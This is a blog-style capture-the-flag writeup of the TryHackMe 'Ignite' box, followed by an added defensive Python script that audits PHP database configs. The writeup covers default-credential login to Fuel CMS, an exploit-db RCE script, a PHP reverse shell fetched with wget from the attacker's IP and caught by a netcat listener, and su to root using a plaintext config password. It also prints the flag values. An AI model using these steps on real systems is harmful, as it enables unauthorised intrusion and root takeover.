aldern00b

Ignite - THM

A new start-up has a few issues with their web server.

Root the box! Designed and created by DarkStar7471, built by Paradox.


You know the drill - enumeration:

OK. Only a website here, running on Apache 2.4.18 on an Ubuntu box. Let's hit the site. Looks like it's a CMS called Fuel 1.4 which hasn't been set up yet. It talks about a GitHub download so there should be some documentation. There's even a link there for the admin portal, /fuel, and the default credentials are supplied.


Wow. It let us in. We can even change the password - lol. Let's change it later... but in real life, I'd change that thing for persistence.

It looks like I can create pages, so let's do that. Trying the pentestmonkey PHP reverse shell gives us an error about the server setup to upload files this size. Let's dig into settings.


Actually, there's a known bug in this: https://www.exploit-db.com/exploits/50477 It's a Python script, so let's go.


OK... seemed easy enough. Can't do much here so we'll have to try and find a way to get us a better shell. First things first, let's:

  • grab the pentestmonkey reverse shell PHP script and edit it so it points back to our IP.

  • start a netcat listener (nc -lvnp 1234)

  • start a Python HTTP server to host our PHP reverse shell (python3 -m http.server)

  • upload that new PHP script to the server, using the shell our exploit script gave us. (wget http://[yourIP]:8000/shell.php)

  • Visit the website we uploaded and this should pop us a shell as the web server.

Once we have the shell we can cd into the user folder and get the first flag.

User.txt is 6470e394cbf6dab6a91682cc8585059b

I did NOT enumerate properly earlier. I was stuck on this for a bit and ended up reading the writeup a bit, where he hinted he found his on the main screen... I try not to read too far into the writeup - once it gives me the start of a hint I stop reading and look for myself.


Looking, I saw this database thing. So since I already have a shell, I decided to cat out that file.

Looks like we have some plain text passwords here and root is right there. Let's do a su to root and get that flag.

Root.txt is b9bbcb33e11b80be759c4e844862482d
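
From the defender's side, the last step worked because the CMS database config held a plaintext password, for root, in a file the web server user could read. The audit below is an added example, not part of the original writeup or of Fuel CMS; it assumes a PHP array-style config with 'username' and 'password' keys, and the file name, sample config and placeholder values are constructed.

```python
import os
import re
import stat
import tempfile

# Assumed format: PHP array entries such as 'password' => 'secret',
ENTRY = re.compile(r"""['"](username|password)['"]\s*=>\s*['"]([^'"]*)['"]""")

def audit_db_config(path):
    """Return a list of findings for one PHP database config file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    # Drop // and # line comments so commented-out samples are not reported.
    text = re.sub(r"^[ \t]*(//|#).*$", "", text, flags=re.M)
    creds = dict(ENTRY.findall(text))  # a later entry overrides an earlier one
    user, password = creds.get("username", ""), creds.get("password", "")
    if password:
        findings.append("plaintext password stored in file")
    if user == "root":
        findings.append("application connects as database root")
    if password and user == "root":
        findings.append("verify this password is not reused for the OS root account")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IROTH:
        findings.append(f"file is world-readable (mode {mode:o})")
    return findings

def demo():
    # Constructed sample config; the values are placeholders, not from the box.
    sample = """<?php
// 'password' => 'old-example',
$db['default'] = array(
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'EXAMPLE-PLACEHOLDER',
    'database' => 'cms',
);
"""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "database.php")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, 0o644)
        return audit_db_config(path)

if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
```

A config that passes this check uses a dedicated low-privilege database account, a password unique to that account, and file permissions that limit reads to the web server user.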